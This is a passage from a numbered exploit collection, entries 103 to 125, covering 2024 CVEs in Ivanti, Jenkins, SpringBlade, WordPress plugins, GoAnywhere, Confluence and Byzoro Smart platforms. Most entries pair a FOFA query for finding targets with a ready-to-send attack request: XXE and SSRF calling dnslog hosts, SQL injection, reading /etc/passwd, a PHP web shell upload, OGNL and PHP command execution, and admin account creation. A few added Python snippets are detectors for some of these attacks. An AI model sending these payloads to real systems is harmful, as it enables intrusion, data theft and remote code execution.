<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

The SSRF sink is the ds:RetrievalMethod URI inside the SAML signature; the server fetches it, so a dnslog hostname there confirms the request reached you.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (a parameter entity whose SYSTEM identifier points at a dnslog host; resolution of that entity is the out-of-band signal):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

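A defensive check for the SAML XXE entry above, written for this page as an added example and not taken from the PoC source or from Ivanti: it decodes a SAMLRequest value and reports any external entity declarations in the DOCTYPE. The sample value is the one in the request above; the benign sample is constructed here. Handling of the two SAML bindings (plain base64 for HTTP-POST, DEFLATE then base64 for HTTP-Redirect) is an assumption this code makes, not something the page states.

```python
import base64
import re
import zlib

# SAMLRequest value copied from the PoC request above (embedded here as a constant).
SAMPLE_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93"
    "ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+"
    "PHI+PC9yPg=="
)

# Constructed benign request for comparison: an AuthnRequest with no DOCTYPE at all.
SAMPLE_BENIGN = base64.b64encode(
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>'
).decode()

# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "pubid" "uri">
# re.S so that a newline between SYSTEM and the URI (as in the PoC) still matches.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(?P<name>[\w.-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]+)"',
    re.S,
)


def decode_saml_request(value: str) -> bytes:
    """Return the XML carried by a SAMLRequest parameter.

    Assumption: HTTP-POST binding sends plain base64; HTTP-Redirect binding
    sends raw-DEFLATE compressed data then base64.  We sniff for a leading '<'.
    """
    raw = base64.b64decode(value)
    if raw.lstrip().startswith(b"<"):
        return raw
    return zlib.decompress(raw, -15)  # raw DEFLATE, no zlib header


def external_entities(xml: bytes) -> list:
    """URIs of every SYSTEM/PUBLIC entity declared in an internal DTD subset."""
    text = xml.decode("utf-8", "replace")
    if "<!DOCTYPE" not in text:
        return []
    return [m.group("uri") for m in ENTITY_RE.finditer(text)]


def check_saml_request(value: str) -> dict:
    """Flag a SAMLRequest that carries a DOCTYPE or external entities.

    A legitimate SAML message never needs a DTD, so has_doctype alone is
    enough to reject; the URI list is what you would hand to IR.
    """
    xml = decode_saml_request(value)
    uris = external_entities(xml)
    has_doctype = b"<!DOCTYPE" in xml
    return {
        "has_doctype": has_doctype,
        "external_entities": uris,
        "suspicious": has_doctype or bool(uris),
    }


if __name__ == "__main__":
    print(check_saml_request(SAMPLE_SAMLREQUEST))
    print(check_saml_request(SAMPLE_BENIGN))
```

On the PoC value the check reports the dnslog URI from the entity declaration; on the constructed benign request it reports nothing. Use the same rule in a WAF or log pipeline: a DOCTYPE in a SAMLRequest is never legitimate.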
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The injection point is the query-string parameter name itself (the whole updatexml(...) expression is the key, =1 the value), so a standard parameter-value scanner will miss it.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Two requests share one Session id: the upload side carries the CLI arguments, the download side receives the output.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side. The argument @/etc/passwd is expanded from the file by the CLI's argument parser, so the first line of the file comes back as the COMMAND default value and the second line in the error message:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

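The byte string in the upload request is the Jenkins CLI's plain-protocol framing: a 4-byte big-endian length, a 1-byte opcode (0 Arg, 1 Locale, 2 Encoding, 3 Start, read off the byte values visible above), then a Java writeUTF string (2-byte length prefix). The following added example, written for this page and not taken from Jenkins or from the PoC author, builds and parses such a body and flags any argument that begins with @, which is what the argument parser expands from a file and what the file read relies on. The frame constant is the PoC body; everything else is this example's own.

```python
import struct

# The upload body from the PoC above, as raw bytes (embedded constant).
SAMPLE_FRAME = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)

# Opcode values as they appear in the PoC bytes: 0 Arg, 1 Locale, 2 Encoding, 3 Start.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "Arg", OP_LOCALE: "Locale", OP_ENCODING: "Encoding", OP_START: "Start"}


def _write_utf(s: str) -> bytes:
    """Java DataOutputStream.writeUTF: 2-byte big-endian length, then the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def _op(opcode: int, payload: bytes = b"") -> bytes:
    """One framed operation: 4-byte length, 1-byte opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([opcode]) + payload


def build_cli_frame(args, encoding="UTF-8", locale="en_US") -> bytes:
    """Encode CLI arguments the way the upload side of /cli does (order as in the PoC)."""
    out = b"".join(_op(OP_ARG, _write_utf(a)) for a in args)
    out += _op(OP_ENCODING, _write_utf(encoding))
    out += _op(OP_LOCALE, _write_utf(locale))
    out += _op(OP_START)
    return out


def parse_cli_frame(data: bytes):
    """Split an upload body into (opcode_name, value) pairs; raises on truncation."""
    ops = []
    pos = 0
    while pos < len(data):
        if pos + 5 > len(data):
            raise ValueError("truncated frame header at offset %d" % pos)
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        opcode = data[pos + 4]
        payload = data[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated payload at offset %d" % pos)
        pos += 5 + length
        if opcode in (OP_ARG, OP_LOCALE, OP_ENCODING):
            (slen,) = struct.unpack(">H", payload[:2])
            value = payload[2:2 + slen].decode("utf-8")
        else:
            value = None
        ops.append((OP_NAMES.get(opcode, "Unknown(%d)" % opcode), value))
    return ops


def suspicious_args(data: bytes):
    """Arguments that the CLI's parser would read from a file: anything starting with '@'."""
    return [v for name, v in parse_cli_frame(data) if name == "Arg" and v.startswith("@")]


if __name__ == "__main__":
    for name, value in parse_cli_frame(SAMPLE_FRAME):
        print(name, value)
    print("file-expansion args:", suspicious_args(SAMPLE_FRAME))
```

A WAF rule on POST /cli with Side: upload can run parse_cli_frame on the body and drop the session if suspicious_args is non-empty; a body that fails to parse is not a valid CLI frame either and is worth logging.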
110. GoAnywhere MFT unauthenticated admin user creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ segment is the Tomcat path-parameter trick: the access check sees a path under /images/, the servlet container normalises it to /wizard/InitialAccountSetup.xhtml.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the front page and take the nonce value from it
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command (queryEditor is evaluated as PHP; the exception carries the command output back in the response)
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<nonce obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

({{rand8}} is a nuclei template placeholder for a random filename; the PoC as published sends an empty file body.)

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

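For the defenders this list is addressed to, an added example that is not part of the original page: a small scanner that runs URL-level rules derived from the PoCs in entries 95, 96, 101, 105–107, 110, 111, 113, 114 and 117 over access-log lines in combined log format. The log lines themselves are constructed (client IPs, timestamps, status codes and sizes are made up); the request targets are the ones shown in the PoCs. Rule names are this example's own labels.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed sample access log.  Targets are copied from the PoCs above; the
# last two lines are ordinary traffic that must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2024:10:00:01 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 512
10.0.0.5 - - [12/Jan/2024:10:00:02 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 80
10.0.0.6 - - [12/Jan/2024:10:00:03 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 12
10.0.0.7 - - [12/Jan/2024:10:00:04 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 3000
10.0.0.8 - - [12/Jan/2024:10:00:05 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 200
10.0.0.9 - - [12/Jan/2024:10:00:06 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 40
10.0.0.9 - - [12/Jan/2024:10:00:07 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1800
10.0.0.10 - - [12/Jan/2024:10:00:08 +0000] "GET /webtools/control/main HTTP/1.1" 200 900
10.0.0.10 - - [12/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=5 HTTP/1.1" 200 300
"""

# Combined log format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def ofbiz_auth_bypass(raw, path, query):
    # Entries 95/96: any /webtools/control/ request carrying requirePasswordChange=Y.
    return path.startswith("/webtools/control/") and "requirepasswordchange=y" in query.lower()


def ivanti_cve_2024_21887(raw, path, query):
    # Entry 101: traversal out of the unauthenticated TOTP endpoint.
    # Matched on the raw target: a normalised path would hide the "../".
    return "/api/v1/totp/user-backup-code/../" in raw


def goanywhere_cve_2024_0204(raw, path, query):
    # Entry 110: Tomcat "..;/" path-parameter trick.
    return "/..;/" in path


def sqli_probe(raw, path, query):
    # Entries 105-107, 111, 114, 117: error-based (updatexml) or time-based (sleep) payloads.
    q = query.lower()
    return "updatexml(" in q or "sleep(" in q


def wp_automatic_cve_2024_27954(raw, path, query):
    # Entry 113: download action pointed at a local file.
    q = query.lower()
    return "wp_automatic=download" in q and "link=file:" in q


RULES = [
    ("ofbiz_auth_bypass", ofbiz_auth_bypass),
    ("ivanti_cve_2024_21887", ivanti_cve_2024_21887),
    ("goanywhere_cve_2024_0204", goanywhere_cve_2024_0204),
    ("sqli_probe", sqli_probe),
    ("wp_automatic_cve_2024_27954", wp_automatic_cve_2024_27954),
]


def scan_log(text: str):
    """Return (client_ip, rule_name, raw_target) for each line that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("target")
        parts = urlsplit(raw)
        path = unquote(parts.path)          # '+' is literal in a path
        query = unquote_plus(parts.query)   # '+' is a space in form-encoded queries
        for name, rule in RULES:
            if rule(raw, path, query):
                hits.append((m.group("ip"), name, raw))
                break
    return hits


if __name__ == "__main__":
    for ip, rule, target in scan_log(SAMPLE_LOG):
        print(ip, rule, target)
```

The rules match the request line only, so they see the Ivanti, GoAnywhere and OFBiz bypasses regardless of response code; that matters because a 403 on the traversal line is still a probe against a host that may be unpatched. Multipart uploads (entries 93, 94, 100, 116, 118, 120, 121) and POST bodies are not visible in an access log and need a WAF or request-body logging instead.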

118. Byzoro (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field sets the destination path on the server. Then access /home/src.php.

119. Byzoro (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

The injection is in the id parameter; a five-second delay confirms the condition (database name length 3).

120. Byzoro (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

